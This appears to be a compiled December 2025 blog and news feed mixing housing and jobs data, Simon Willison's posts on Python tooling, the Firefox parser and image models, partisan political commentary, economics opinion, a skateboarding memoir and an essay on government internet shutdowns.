
A: GameZone provides real-time Tongits matches in a structured environment alongside other Filipino card games.


CLICK HERE TO DONATE IN SUPPORT OF DCREPORT’S NONPROFIT NEWSROOM

The post Best Free Tongits Game Online Platforms for 2025 appeared first on DCReport.org.

3rd Look at Local Housing Markets in November

Today, in the Calculated Risk Real Estate Newsletter: 3rd Look at Local Housing Markets in November

A brief excerpt:
First, California reports seasonally adjusted sales and some measures of inventory. From the California Association of Realtors® (C.A.R.): California home sales reach three-year high in November, C.A.R. reports
Sales increased 1.9 percent from October, rising from 282,590 to 287,940 in November. Compared with a year earlier, November sales were up 2.6 percent from a revised 280,530.
Closed Existing Home SalesIn November, sales in these markets were down 7.1% YoY. Last month, in October, these same markets were up 1.5% year-over-year Not Seasonally Adjusted (NSA).

Important: There was one fewer working days in November 2025 (18) as in November 2024 (19). So, the year-over-year change in the headline SA data will be more than the change in NSA data (there are other seasonal factors).
...
Several local markets - like Illinois, Miami, New Jersey and New York - will report after the NAR release.
There is much more in the article.

Poe the Poet

Poe the Poet

I was looking for a way to specify additional commands in my pyproject.toml file to execute using uv. There's an enormous issue thread on this in the uv issue tracker (300+ comments dating back to August 2024) and from there I learned of several options including this one, Poe the Poet.

It's neat. I added it to my s3-credentials project just now and the following now works for running the live preview server for the documentation:

uv run poe livehtml

Here's the snippet of TOML I added to my pyproject.toml:

[dependency-groups]
test = [
    "pytest",
    "pytest-mock",
    "cogapp",
    "moto>=5.0.4",
]
docs = [
    "furo",
    "sphinx-autobuild",
    "myst-parser",
    "cogapp",
]
dev = [
    {include-group = "test"},
    {include-group = "docs"},
    "poethepoet>=0.38.0",
]

[tool.poe.tasks]
docs = "sphinx-build -M html docs docs/_build"
livehtml = "sphinx-autobuild -b html docs docs/_build"
cog = "cog -r docs/*.md"

Since poethepoet is in the dev= dependency group any time I run uv run ... it will be available in the environment.

Tags: packaging, python, s3-credentials, uv

Being a Huge Asshole Is Not Good Politics

Official White House Photo by Daniel Torok

The Cross Section is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.

President Trump has a big problem. Every president has ups and downs and has to confront situations not entirely of their making. The successful ones create a stock of good will they can draw on when things are not going great, so the public will trust them enough to be patient while we wait for things to turn around.

The trouble Trump has is that he’s an absolutely terrible human being in every way, and while he has always had a unique kind of charisma and a keen radar for people’s darkest impulses, both of those qualities are beginning to erode as he ages rapidly and becomes more erratic. The worst parts of himself are becoming only more vivid.

It’s going to be increasingly visible in all kinds of ways, but for now let’s focus on two examples. Here’s today’s economic news, as we got both the November jobs numbers and the October numbers that were delayed by the government shutdown:

The U.S. unemployment rate rose to 4.6% in November, its highest in more than four years, fueling questions about the American economy’s underlying strength.

A long-delayed government report on Tuesday showed that 64,000 jobs were gained in November, while 105,000 jobs were lost in October.

The unemployment rate in November rose to 4.6%, from 4.4% in September, the last month the Labor Department had reported the unemployment rate.

Job losses in June, August and October mean the U.S. economy has shed jobs in three out of the past six months.

That’s very bad. Nobody knows for sure if it will get worse, but the reaction from the White House — which works hard to channel Trump in both style and substance in every utterance it makes, was this;

Woo hoo! Yeah baby! The bad news is actually good, and also, immigrants suck!

You’ll remember that Joe Biden and his aides were scolded endlessly for trying to find silver economic linings when inflation was high in 2022 and 2023, but the difference is that there actually was plenty of good news back then, especially in job growth. Over 16 million jobs were created in Biden’s term, a record unmatched in American history. What the administration tried to do then was to point to what was good, but also acknowledge people’s lived experience; every time they said anything about the economy, it would start with “We know people are struggling, and prices are too high. But we’re working every day…”

Trump is simply not capable of that — and if he ever was, he certainly isn’t now. His aides can write a speech for him that includes some empathetic notes, but he will inevitably go off-script to ramble on about how people’s feelings are not real and it’s all a hoax.

If you are actually having trouble making ends meet, Trump is telling you you’re a sucker, that you’re too dumb to see through the lies Democrats tell. That’s profoundly insulting. It shows that he doesn’t give a crap about you, because all he cares about is whether some piece of news reflects well or poorly on himself, and if it’s the latter, it must be a lie or somebody else’s fault.

It’s not that the right expressions of empathy and clever spin can neutralize the political harm the president will endure when the economy does poorly, but at least one can avoid making things worse. Which Trump can’t.

Example #2: Rob Reiner’s death

When Trump learned that Rob Reiner and his wife Michele had been murdered, he didn’t stop and consider what the most appropriate response might be, whether on a political or a human level. He reacted on impulse, and since his worldview is that people who like him are good and people who don’t like him are bad, he sent this repugnant message out on his social media platform:

You don’t have to read between the lines to understand that if Reiner was murdered because he had criticized Trump (which of course is not what happened), then as far as Trump is concerned, his murder was a good thing. But since Trump is now in a weakened political state, a bunch of Republicans scolded him publicly over it, something that few have had the courage to do in the past.

Even when he was offered the chance to explain, he couldn’t bring himself to say what any decent human being would, something like “We had our political differences, but obviously it’s a tragedy for their family and friends.” Instead, he said, “I wasn’t a fan of his at all. He was a deranged person as far as Trump is concerned.”

If anyone says “But liberals celebrated Charlie Kirk’s murder!”, I’d ask, which liberals specifically? A nurse in Sheboygan? A plumber in Billings? Yes, there were people who sent out variants of He had it coming to their 75 Facebook friends. Hundreds of them lost their jobs for expressing that sentiment, or even milder ones. But I didn’t see a single Democratic politician describe Kirk’s death as anything but a tragedy. And Trump isn’t just some random person, he’s the president of the United States. He’s supposed to show some class at a moment like that, but he can’t.

Again, this is not an intentional strategy; Trump is just a terrible person in every way, and he’s incapable of even pretending to have any virtues. But we want that in a president, and we especially want it when dark things happen. As crude as it might be to acknowledge, tragedy creates a political opportunity for leaders who can rise to the moment. Think of Ronald Reagan addressing the country after the Challenger disaster, or George W. Bush vowing vengeance atop the rubble of the World Trade Center (and yes, that didn’t turn out too well, but at the time, it was exactly what most Americans wanted to hear).

Being a huge asshole has produced some political dividends for Trump in the past, but it has become a liability. When Indiana Republicans decided not to redraw their district lines to eliminate every Democratic district as Trump had instructed them to do, a number of them told reporters it was precisely because the White House’s pressure campaign was so aggressive and ham-handed, and inevitably backed up by a wave of threats and even swatting attempts from Trump’s widely distributed army of chuds. One state senator who has a daughter with Down syndrome specifically cited Trump calling Minnesota Gov. Tim Walz “retarded” as a reason he refused to submit to Trump’s wishes.

Yes, there are certain portions of Trump’s base that are attracted to him not in spite of the fact that he’s a monster, but because of it. They love that he attacks the people they hate in crude and ruthless ways; they love his violent rhetoric; they love his racism and his misogyny. But those people have never been anything approaching a majority of the electorate.

To succeed, Trump has needed the support of millions of voters who tolerate the fact that he’s an awful human being because they thought they were getting something else out of the deal. He’d shake things up, he’d fight for the little guy, he’d make the economy hum. But when Trump is just a corrupt oligarch handing out favors to his rich friends, and he’s hurting the economy, and he’s making health care costs rise, and he’s insulting you and yours? Then the fact that he’s such an asshole no longer seems so unimportant.

Thank you for reading The Cross Section. This site has no paywall, so I depend on the generosity of readers to sustain the work I present here. If you find what you read valuable and would like it to continue, consider becoming a paid subscriber.

Leave a comment

Subscribe now

firefox parser/html/java/README.txt

firefox parser/html/java/README.txt

TIL (or TIR - Today I was Reminded) that the HTML5 Parser used by Firefox is maintained as Java code (commit history here) and converted to C++ using a custom translation script.

You can see that in action by checking out the ~8GB Firefox repository and running:

cd parser/html/java
make sync
make translate

Here's a terminal session where I did that, including the output of git diff showing the updated C++ files.

I did some digging and found that the code that does the translation work lives, weirdly, in the Nu Html Checker repository on GitHub which powers the W3C's validator.w3.org/nu/ validation service!

Here's a snippet from htmlparser/cpptranslate/CppVisitor.java showing how a class declaration is converted into C++:

    protected void startClassDeclaration() {
        printer.print("#define ");
        printer.print(className);
        printer.printLn("_cpp__");
        printer.printLn();

        for (int i = 0; i < Main.H_LIST.length; i++) {
            String klazz = Main.H_LIST[i];
            if (!klazz.equals(javaClassName)) {
                printer.print("#include \"");
                printer.print(cppTypes.classPrefix());
                printer.print(klazz);
                printer.printLn(".h\"");
            }
        }

        printer.printLn();
        printer.print("#include \"");
        printer.print(className);
        printer.printLn(".h\"");
        printer.printLn();
    }

Here's a fascinating blog post from John Resig explaining how validator author Henri Sivonen introduced the new parser into Firefox in 2009.

Via Hacker News conversation

Tags: c-plus-plus, firefox2, henri-sivonen, java, john-resig, mozilla

The new ChatGPT Images is here

The new ChatGPT Images is here

OpenAI shipped an update to their ChatGPT Images feature - the feature that gained them 100 million new users in a week when they first launched it back in March, but has since been eclipsed by Google's Nano Banana and then further by Nana Banana Pro in November.

The focus for the new ChatGPT Images is speed and instruction following:

It makes precise edits while keeping details intact, and generates images up to 4x faster

It's also a little cheaper: OpenAI say that the new gpt-image-1.5 API model makes image input and output "20% cheaper in GPT Image 1.5 as compared to GPT Image 1".

I tried a new test prompt against a photo I took of Natalie's ceramic stand at the farmers market a few weeks ago:

Add two kakapos inspecting the pots

Outdoor craft market booth displaying handmade ceramics and jewelry on a navy tablecloth with "NATBAT CREATIONS CALIFORNIA USA" logo. Items include colorful glazed ceramic cups in blue, orange, and black; decorative bowls including a rainbow-striped piece; jewelry pendants and earrings on wooden display stands; ceramic plant markers in various colors labeled "Artichoke", "Cilantro", "Chili", "Oregano", "Potato", "Pumpkin", "Sage".

Here's the result from the new ChatGPT Images model:

Same craft market booth as previous image, now with two large olive-green Kākāpō parrots perched on the table among the ceramics, one investigating the blue glazed cups and the other examining an orange cup.

And here's what I got from Nano Banana Pro:

Same craft market booth with two Kākāpō now in different positions: one remains center-table peering into the ceramic cups near the rainbow pot, while the second has moved to the right edge of the table near the plant markers, appearing to examine or possibly chew on items at the table's corner. They are both a little smaller than in the first image.

The ChatGPT Kākāpō are a little chonkier, which I think counts as a win.

I was a little less impressed by the result I got for an infographic from the prompt "Infographic explaining how the Datasette open source project works" followed by "Run some extensive searches and gather a bunch of relevant information and then try again" (transcript):

Infographic titled "HOW DATASETTE WORKS" with subtitle "THE OPEN SOURCE DATA PLATFORM" showing a four-step workflow. STEP 1 (orange): "LOAD YOUR DATA" - "CSV, JSON, XLSX, SQLite, PostgreSQL, etc." with icons of file types flowing into a laptop. Below: "IMPORT DATASETS - Turn your structured data into SQLite databases and .db files." with checkmarks for "Datasette Desktop App for local deployment", "CLI tool for command-line imports", "Automatic CSV import tool". STEP 2 (green): "PUBLISH & DEPLOY" - "HOST DATASETS ONLINE" with cloud and server icons labeled "DEPLOY". Below: "SHARE ONLINE - Deploy your Datasette instance to a public server." with checkmarks for "Datasette Cloud - Free hosting service", "Deploy anywhere via plugins", "Configurable API tools". STEP 3 (purple): "EXPLORE & QUERY" - "BROWSE, SEARCH & VISUALIZE" with database and browser window icons. Below: "SQL QUERIES & SEARCH - Browse, filter, search, and visualize your data with an interactive web interface." with checkmarks for "Perform SQL queries directly from the browser", "Filter, sort, and facet data", "Generate custom visualizations and charts". STEP 4 (red): "BUILD & EXTEND" - "PLUGINS, APIS & INTEGRATIONS" with gear and wrench icons labeled "API". Below: "CUSTOMIZE & DEVELOP" with bullets "Develop custom plugins for added functionality", "Access JSON API for programmatic queries", "Embed and integrate Datasette into other applications". Bottom banner shows four features: "OPEN DATA PLATFORM - Widely used for visualizing, sharing and building applications with SQLite backed data", "EXTENSIBLE PLUGINS - 100+ plugins available, inc uding chaps, charts authentication, and more", "ACCESS CONTROL - Granular permissions for controlling who s an access and interact with your data", "OPEN SOURCE PROJECT - Actively developed open source project with a vibrant community of contributors".

See my Nano Banana Pro post for comparison.

Both models are clearly now usable for text-heavy graphics though, which makes them far more useful than previous generations of this technology.

Tags: ai, kakapo, openai, generative-ai, text-to-image, nano-banana

s3-credentials 0.17

s3-credentials 0.17

New release of my s3-credentials CLI tool for managing credentials needed to access just one S3 bucket. Here are the release notes in full:

  • New commands get-bucket-policy and set-bucket-policy. #91
  • New commands get-public-access-block and set-public-access-block. #92
  • New localserver command for starting a web server that makes time limited credentials accessible via a JSON API. #93

That s3-credentials localserver command (documented here) is a little obscure, but I found myself wanting something like that to help me test out a new feature I'm building to help create temporary Litestream credentials using Amazon STS.

Most of that new feature was built by Claude Code from the following starting prompt:

Add a feature s3-credentials localserver which starts a localhost weberver running (using the Python standard library stuff) on port 8094 by default but -p/--port can set a different port and otherwise takes an option that names a bucket and then takes the same options for read--write/read-only etc as other commands. It also takes a required --refresh-interval option which can be set as 5m or 10h or 30s. All this thing does is reply on / to a GET request with the IAM expiring credentials that allow access to that bucket with that policy for that specified amount of time. It caches internally the credentials it generates and will return the exact same data up until they expire (it also tracks expected expiry time) after which it will generate new credentials (avoiding dog pile effects if multiple requests ask at the same time) and return and cache those instead.

Tags: aws, projects, s3, ai, annotated-release-notes, s3-credentials, prompt-engineering, generative-ai, llms, coding-agents, claude-code

ty: An extremely fast Python type checker and LSP

ty: An extremely fast Python type checker and LSP

The team at Astral have been working on this for quite a long time, and are finally releasing the first beta. They have some big performance claims:

Without caching, ty is consistently between 10x and 60x faster than mypy and Pyright. When run in an editor, the gap is even more dramatic. As an example, after editing a load-bearing file in the PyTorch repository, ty recomputes diagnostics in 4.7ms: 80x faster than Pyright (386ms) and 500x faster than Pyrefly (2.38 seconds). ty is very fast!

The easiest way to try it out is via uvx:

cd my-python-project/
uvx ty check

I tried it against sqlite-utils and it turns out I have quite a lot of work to do!

Astral also released a new VS Code extension adding ty-powered language server features like go to definition. I'm still getting my head around how this works and what it can do.

Via Hacker News

Tags: python, vs-code, astral

I'm not budging

It is often best to leave well enough alone.

Throughout human history, there have been many golden ages. But there’s been none that were anywhere near as golden as the end of the second millennium. The world saw its greatest economic boom in the late 20th century, and this dramatically reduced the share of the population suffering from extreme poverty. The proximate cause of this boom was economic reforms in many countries, most notably China, India and Eastern Europe, but also including places such as Australia, New Zealand, Chile, Panama and the Dominican Republic. In terms of human welfare (and what else matters?) the neoliberal boom is by far the best thing that ever happened:

In my own field of economics, a “Washington Consensus” was reached that industrial policies do not work and that free market reforms were the way to go. Between 1990 and 2000, six Nobel Prizes in Economics went to professors at the University of Chicago, a hotbed of free market economics.

In the field of macroeconomics, things had never been better. The profession had largely moved away from outdated Keynesian ideas such as using fiscal policy to stabilize the business cycle, or the myth that monetary policy was ineffective at the zero lower bound. Western economists were highly critical of the Bank of Japan for not doing enough monetary stimulus to escape from deflation, dismissing BOJ claims that it was powerless to act. Fiscal austerity was in style, and indeed the US ran three consecutive budget surpluses at the end of the millennium.

Of course, things were not perfect. Although the famous “China Shock” paper argued that trade with China was beneficial to the US in an overall sense, the authors also showed that many local communities were adversely affected. Unfortunately, people cannot leave well enough along. Just when economic scholars and policymakers had mostly figured things out, we got restless and began reverting to all the mistakes of the mid-20th century. Here are just a few examples:

  1. Economists began to doubt the efficacy of monetary policy, especially at the zero lower bound.

  2. Economists began to forget about monetary offset of fiscal policy.

  3. Economists began to suggest that budget deficits don’t matter when interest rates are low. (But what if they don’t stay low?)

  4. Economists increasingly cited interest rates as an indicator of the stance of monetary policy. (They are not.)

  5. Economists began edging back toward discredited Phillips Curve theories that favor easy money as a way to create jobs.

  6. Economists found strange new respect for previously discredited policies such as price controls and protectionism, at least in limited cases.

  7. Economists began to revert back to discredited theories that antitrust officials needed to worry about low prices, not high prices.

  8. Some economists began to question whether the Fed was even able to target inflation, as various fiscal theories of the price level became popular on both the left and the right, despite almost no empirical support.

It is difficult to disentangle cause and effect. Did the changing views of economists cause a deterioration in public policy? Were opportunistic economists trying to cash in on a change in the prevailing sentiment of policymakers? Or were both responding to a change in the zeitgeist?

Whatever the explanation, we began to see more advocacy of policies such as government ownership of formerly private business, the increased use of rent controls, and Wright-Patman style anti-trust regulation. There was a rise in protectionism. After the mid-2010s, we implemented reckless and unsustainable fiscal deficits.

Unlike during previous periods of American history, this was mostly an unforced error. No world war or Great Depression made big deficits inevitable. We did this to ourselves.

It has become fashionable to reject neoliberalism, but the arguments against it are quite weak. In almost every case, the more neoliberal economy does better than the otherwise similar less neoliberal economy. Similarly, arguments against circa 2005 monetary theory are quite weak.

By the early 2000s, the Fed had adopted a very effective monetary regime, which kept inflation close to 2%. The Fed had a small balance sheet, with liabilities that were 98% composed of currency. The asset side of the balance sheet was almost entirely Treasury securities. And then in 2008 we threw it all away, with a completely unnecessary policy of paying interest on bank reserves. This led to a massively bloated Fed balance sheet, which allowed our central bank to intervene much more aggressively in the credit markets.

Call me a grouchy old reactionary, but I’m not budging. The policy consensus of 20 years ago was far superior to the policy consensus of today. In my view:

  1. Fiat money central banks can always boost nominal GDP, if they choose to do so. They can also restrain inflation, if they choose to do so.

  2. We should not pay interest on bank reserves.

  3. We should not use fiscal stabilization policy.

  4. We should balance the budget, at least in real terms.

  5. We should have free trade with countries that don’t invade their neighbors.

  6. Anti-trust should focus on high prices, not low prices.

  7. We should avoid so-called industrial policies. (Check out Richard’s Hanania’s post on the subject.)

  8. We should avoid rent controls, price controls and government ownership of business.

  9. We should end residential zoning restrictions and move toward school choice, health saving accounts, carbon taxes, congestion pricing and progressive consumption taxes.

At the end of the last millennium the world had finally figured it out, and then . . .

Skateboarding at 90

If you were a rocknroller in the ‘70s, you’ll remember a song by Dr. Hook,

“…the thrill we’ve never known
Is the thrill that’ll get ya when you get your pitcha on the cover of the Rolling Stone”

WELL — I made it on the cover of my hometown newspaper on Saturday, November 29.

Peter Hartlaub, Culture Critic of the Chronicle ,wrote the article, after a Zoom interview and then a visit to the homestead along with photographers Benjamin Fanjoy and Ryan Curry. You never know how interviews will turn out, but this turned out to be a good one.

Here’s the article: https://archive.ph/akTJ8

Live From California with Lloyd Kahn is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.

It brought to mind Doc Ball, an older surfer, who wrote the book California Surfriders in 1946, which we all had in the ‘50s (when we were surfing in Santa Cruz before wetsuits). Doc also skated in his later years and I remember seeing a film of him skating in his ‘90s, and thinking ”Wow!”

Doc Ball skating in his ‘80s
Doc surfing at WindanSea in SoCal in the ‘40s. Check out his board!

Here’s a film of Doc skating at age 92:

https://www.eos.surf/videos/video-doc-ball-skateboarding-at-age-92


Above: me skating last month at the bottom of the Bolinas-Fairfax road, with my Tangent board from Loaded Boards. This is a breakthrough board: stable, smooth, maneuverable. It rejuvenates my skating stoke. Every time I look at it, I want to roll. Thanks to Don and the boys at Loaded for keeping me rolling.

Thoughts on Aging

OK, so I’m doing things that not many 90-year-olds do, but it’s simply that I’ve kept at it. I think the baby boomers are going to have a large percentage of active older people.

By far the most popular post I’ve done here has beenA The Final Lap, or What It’s Like to Be 89. Now that I’m a year older, I’m planning another post on the subject, but here are a couple of random thoughts on the 10th decade.

It’s new territory. We’ve never been this old before. And sure, you could say the same thing for your ‘50s or ‘60s or ‘70s, but the difference now is that things are breaking down. I’m way weaker now than I was 25 years ago. Not as flexible. I wear hearing aids, have needed two tooth implants, depth perception not so good. Nature is trying to figure out how to take us down.

We have a lot more past than future.

There are fewer same-age compatriots, with whom to share precious memories. Our semi-annual Lowell High School lunches now consist of 7 of us — last men standing.

With my friend Tony Serra about 10 years ago. We’ve known each other for over 70 years.

Resist much, obey little - Walt Whitman

Thanks for reading Live From California with Lloyd Kahn! This post is public so feel free to share it.

Share

An A+++++ Economy, My A++

When Politico recently asked Donald Trump to grade the current U.S. economy, he replied “A-plus-plus-plus-plus-plus.” He made this boast at a time when actual economic data were still scarce, a consequence of the government shutdown that stopped or delayed key information about the state of the job market.

Yesterday the report on employment during the month of November finally arrived. And the message of the report on the state of the US economy was clear: A+++++ my A++. While it’s too soon to declare that we’re in a recession, the data are at least pre-recessionary: that is, the numbers are weak enough that we should be seriously worried that a recession is coming. And that’s a state of affairs completely at odds with Trump’s rose-colored — spray-tanned? — picture.

I’ll talk about the reasons the gap between Trump’s big boasts and the glum reality matters in a minute. First, however, let’s talk about what we learned from yesterday’s report.

Most importantly, the data show a weak labor market. Employment isn’t falling off a cliff, but job growth has been weak and hasn’t kept pace with the number of people seeking work. The headline unemployment rate in November was 4.6 percent, up from an average of 4 percent in 2024. That number is close to triggering the Sahm Rule, an economic rule of thumb devised by Claudia Sahm, a former economist at the Board of Governors of the Federal Reserve, that has historically been highly successful at identifying the early stages of a recession.

We can’t do a strict application of the Sahm Rule yet because Sahm’s method is based on the average unemployment rate over the past three months. Unfortunately, the shutdown prevented the Bureau of Labor Statistics from collecting key data in October. But if we do an interpolation of October’s unemployment rate by averaging over September’s rate of 4.4% and November’s rate of 4.6%, we can estimate that October’s unemployment rate was 4.5%. And those 3 months of unemployment numbers bring us within a whisker of the unemployment rise that, according to the Sahm Rule, signals that a recession is on the horizon.

The state of the economy looks even worse if we take a wider view of the labor market. The BLS calculates 6 different measures of unemployment. The most commonly cited number is U-3 — the number of workers who are actively seeking jobs but haven’t found them. But the broadest measure is U-6, which includes underemployed workers stuck in part-time employment and discouraged workers who have temporarily given up job search. And U-6 has risen sharply since January, when Trump took office:

A graph showing a line going up

AI-generated content may be incorrect.

Source: BLS

Further evidence consistent with a poor and deteriorating job market is data showing that the number of job-seekers who are long-term unemployed – that is, have been unemployed for 27 weeks or more – has risen by almost a third (from 1.45 million to 1.91 million) since 2024. This means that the unemployed are finding it harder to find jobs.

In addition to collecting data from workers, the BLS surveys employers. Interpreting the employer-side numbers is a bit tricky right now, because there are technical challenges in how the BLS models the birth of new firms and the deaths of old ones. None other than Jerome Powell has suggested that official job growth is probably overstated by around 60,000 a month. Yet even if we ignore this likely overstatement of the number of jobs created, yesterday’s numbers are definitely pointing to a troubled economy.

In particular, the Trumpian project of bringing “masculine” blue-collar jobs back is going badly. I’m going to steal a chart from Joey Politano, whose Substack you should be reading:

A graph on a black background

AI-generated content may be incorrect.

So while yesterday’s job report wasn’t a cause for outright panic, it does reveal real reasons to worry that the economy is deteriorating.

And Trump owns this economy — because he broke it.

Normally, when a president experiences a troubled economy during his first year he dispatches his flying monkeys minions to declare that it’s all his predecessor’s fault. And some Trump officials, like Scott Bessent, are indeed trying to play the blame game. But this standard political tactic is unlikely to work for this president.

First, the economy that Trump inherited when he took office was in much better shape than today’s economy, with lower unemployment combined with faster job growth, and inflation trending down.

Second, Trump’s radical policy changes – huge (illegal) tariffs, mass deportations, big tax cuts (for the rich), benefit cuts (for the poor and middle class), mass layoffs of federal workers, disinvesting in huge green energy projects and aid to farmers — have been clearly damaging to everything besides crypto and AI. It strains credulity – even for the Trump faithful – to claim that we are still in Joe Biden’s economy.

Third, how can Trump blame Biden for a troubled economy when he won’t admit that we have a troubled economy? It’s more than credible that the source of the public’s falling economic confidence is the two Trump “gaps” — the difference between what he promised and what he has delivered, and the gap between what he says is happening and what everyone can see with their own eyes.

Politics aside, it’s important to understand that the bleak economic news we’re getting is only the beginning. “Populist” leaders like Trump — I don’t like the term, but it has come to mean politicians who have disdain for responsible policy and the rule of law — do long-term economic damage. One comprehensive comparative study found that, on average, such leaders leave GDP 10 percent lower after 15 years than it would otherwise have been. So Trumpism is reducing our future living standards.

Trump is going to make a prime-time address to the nation tonight. The details of his speech haven’t been announced, but it’s a good guess that he intends to gaslight Americans yet again, claiming that things are going well. They aren’t.

MUSICAL CODA

Where America’s most prominent short-sellers are placing their bets

We interview three financial sleuths

The local politics of deceased organ donation

 "All politics is local" may not be entirely true, but local politics doesn't end at death.

MedPage Today has the story: 

Senators Urge More Localized Use of Donor Organs
— "Too many of our organs are leaving"
the geographic area, says Sen. Roger Marshall, MD
by Joyce Frieden, 

"More needs to be done to make sure donated organs are transplanted to recipients within the local geographic area whenever possible, several senators said Thursday at a hearing on the future of the organ procurement and transplantation network.

"The Midwest, where I'm from ... is famous that we have a higher organ donor rate than the [East or West] coasts do typically," said Sen. Roger Marshall, MD (R-Kansas). "And you know, there's a concern that too many of our organs are leaving the Midwest."
 

California facts of the day

At Berkeley, as recently as 2015, white male hires were 52.7 percent of new tenure-track faculty; in 2023, they were 21.5 percent. UC Irvine has hired 64 tenure-track assistant professors in the humanities and social sciences since 2020. Just three (4.7 percent) are white men. Of the 59 Assistant Professors in Arts, Humanities and Social Science appointed at UC Santa Cruz between 2020-2024, only two were white men (3 percent).

Here is the essay by Jacob Savage that everyone is talking about.

The post California facts of the day appeared first on Marginal REVOLUTION.

       

Comments

Related Stories

 

Deliberate Internet Shutdowns

For two days in September, Afghanistan had no internet. No satellite failed; no cable was cut. This was a deliberate outage, mandated by the Taliban government. It followed a more localized shutdown two weeks prior, reportedly instituted “to prevent immoral activities.” No additional explanation was given. The timing couldn’t have been worse: communities still reeling from a major earthquake lost emergency communications, flights were grounded, and banking was interrupted. Afghanistan’s blackout is part of a wider pattern. Just since the end of September, there were also major nationwide internet shutdowns in Tanzania and Cameroon, and significant regional shutdowns in Pakistan and Nigeria. In all cases but one, authorities offered no official justification or acknowledgment, leaving millions unable to access information, contact loved ones, or express themselves through moments of crisis, elections, and protests.

The frequency of deliberate internet shutdowns has skyrocketed since the first notable example in Egypt in 2011. Together with our colleagues at the digital rights organisation Access Now and the #KeepItOn coalition, we’ve tracked 296 deliberate internet shutdowns in 54 countries in 2024, and at least 244 more in 2025 so far.

This is more than an inconvenience. The internet has become an essential piece of infrastructure, affecting how we live, work, and get our information. It’s also a major enabler of human rights, and turning off the internet can worsen or conceal a spectrum of abuses. These shutdowns silence societies, and they’re getting more and more common.

Shutdowns can be local or national, partial or total. In total blackouts, like Afghanistan or Tanzania, nothing works. But shutdowns are often targeted more granularly. Cellphone internet could be blocked, but not broadband. Specific news sites, social media platforms, and messaging systems could be blocked, leaving overall network access unaffected—as when Brazil shut off X (formerly Twitter) in 2024. Sometimes bandwidth is just throttled, making everything slower and unreliable.

Sometimes, internet shutdowns are used in political or military operations. In recent years, Russia and Ukraine have shut off parts of each other’s internet, and Israel has repeatedly shut off Palestinians’ internet in Gaza. Shutdowns of this type happened 25 times in 2024, affecting people in 13 countries.

Reasons for the shutdowns are as varied as the countries that perpetrate them. General information control is just one. Shutdowns often come in response to political unrest, as governments try to prevent people from organizing and getting information; Panama had a regional shutdown this summer in response to protests. Or during elections, as opposition parties utilize the internet to mobilize supporters and communicate strategy. Belarusian president Alyaksandr Lukashenko, who has ruled since 1994, reportedly disabled the internet during elections earlier this year, following a similar move in 2020. But they can also be more banal. Access Now documented countries disabling parts of the internet during student exam periods at least 16 times in 2024, including Algeria, Iraq, Jordan, Kenya, and India.

Iran’s shutdowns in 2022 and June of this year are good examples of a highly sophisticated effort, with layers of shutdowns that end up forcing people off the global internet and onto Iran’s surveilled, censored national intranet. India, meanwhile, has been the world shutdown leader for many years, with 855 distinct incidents. Myanmar is second with 149, followed by Pakistan and then Iran. All of this information is available on Access Now’s digital dashboard, where you can see breakdowns by region, country, type, geographic extent, and time.

There was a slight decline in shutdowns during the early years of the pandemic, but they have increased sharply since then. The reasons are varied, but a lot can be attributed to the rise in protest movements related to economic hardship and corruption, and general democratic backsliding and instability. In many countries today, shutdowns are a knee-jerk response to any form of unrest or protest, no matter how small.

A country’s ability to shut down the internet depends a lot on its infrastructure. In the US, for example, shutdowns would be hard to enforce. As we saw when discussions about a potential TikTok ban ramped up two years ago, the complex and multifaceted nature of our internet makes it very difficult to achieve. However, as we’ve seen with total nationwide shutdowns around the world, the ripple effects in all aspects of life are immense. (Remember the effects of just a small outage—CrowdStrike in 2024—which crippled 8.5 million computers and cancelled 2,200 flights in the US alone?)

The more centralized the internet infrastructure, the easier it is to implement a shutdown. If a country has just one cellphone provider, or only two fiber optic cables connecting the nation to the rest of the world, shutting them down is easy.

Shutdowns are not only more common, but they’ve also become more harmful. Unlike in years past, when the internet was a nice option to have, or perhaps when internet penetration rates were significantly lower across the Global South, today the internet is an essential piece of societal infrastructure for the majority of the world’s population.

Access Now has long maintained that denying people access to the internet is a human rights violation, and has collected harrowing stories from places like Tigray in Ethiopia, Uganda, Annobon in Equatorial Guinea, and Iran. The internet is an essential tool for a spectrum of rights, including freedom of expression and assembly. Shutdowns make documenting ongoing human rights abuses and atrocities more difficult or impossible. They are also impactful on people’s daily lives, business, healthcare, education, finances, security, and safety, depending on the context. Shutdowns in conflict zones are particularly damaging, as they impact the ability of humanitarian actors to deliver aid and make it harder for people to find safe evacuation routes and civilian corridors.

Defenses on the ground are slim. Depending on the country and the type of shutdown, there can be workarounds. Everything, from VPNs to mesh networks to Starlink terminals to foreign SIM cards near borders, has been used with varying degrees of success. The tech-savvy sometimes have other options. But for most everyone in society, no internet means no internet—and all the effects of that loss.

The international community plays an important role in shaping how internet shutdowns are understood and addressed. World bodies have recognized that reliable internet access is an essential service, and could put more pressure on governments to keep the internet on in conflict-affected areas. But while international condemnation has worked in some cases (Mauritius and South Sudan are two recent examples), countries seem to be learning from each other, resulting in both more shutdowns and new countries perpetrating them.

There’s still time to reverse the trend, if that’s what we want to do. Ultimately, the question comes down to whether or not governments will enshrine both a right to access information and freedom of expression in law and in practice. Keeping the internet on is a norm, but the trajectory from a single internet shutdown in 2011 to 2,000 blackouts 15 years later demonstrates how embedded the practice has become. The implications of that shift are still unfolding, but they reach far beyond the moment the screen goes dark.

This essay was written with Zach Rosson, and originally appeared in Gizmodo.

MBA: Mortgage Applications Decrease in Latest Weekly Survey

From the MBA: Mortgage Applications Decrease in Latest MBA Weekly Survey
Mortgage applications decreased 3.8 percent from one week earlier, according to data from the Mortgage Bankers Association’s (MBA) Weekly Mortgage Applications Survey for the week ending December 12, 2025.

The Market Composite Index, a measure of mortgage loan application volume, decreased 3.8 percent on a seasonally adjusted basis from one week earlier. On an unadjusted basis, the Index decreased 5 percent compared with the previous week. The Refinance Index decreased 4 percent from the previous week and was 86 percent higher than the same week one year ago. The seasonally adjusted Purchase Index decreased 3 percent from one week earlier. The unadjusted Purchase Index decreased 7 percent compared with the previous week and was 13 percent higher than the same week one year ago.

“Mortgage rates inched up last week following the FOMC meeting, as investors interpreted the comments to signal that we are near the end of this rate cutting cycle. As a result, mortgage applications declined slightly,” said Mike Fratantoni, MBA’s SVP and Chief Economist. “Purchase application volume typically drops off quickly at the end of the year, and this shifts the mix of the business, with the refinance share reaching 59 percent last week, the highest level since September. However, refinance activity has remained mostly the same for the past month as rates continue to hold at around the same narrow range.”
...
